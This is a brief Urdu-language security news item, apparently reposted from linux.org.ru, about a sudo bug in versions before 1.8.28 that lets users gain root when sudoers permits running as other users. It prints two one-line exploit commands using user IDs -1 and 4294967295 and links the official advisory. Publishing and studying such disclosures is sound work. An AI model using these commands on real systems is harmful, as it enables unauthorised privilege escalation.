sudo میں ایک بگ آپ کو کسی بھی قابل عمل فائل کو روٹ کے طور پر چلانے کی اجازت دیتا ہے اگر /etc/sudoers اسے دوسرے صارفین کے ذریعہ انجام دینے کی اجازت دیتا ہے اور روٹ کے لئے ممنوع ہے۔
غلطی کا استحصال بہت آسان ہے:
sudo -u#-1 id -u
یا:
sudo -u#4294967295 id -u
خرابی 1.8.28 سے پہلے sudo کے تمام ورژن میں موجود ہے۔
تفصیلات:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
https://www.sudo.ws/alerts/minus_1_uid.html
ماخذ: linux.org.ru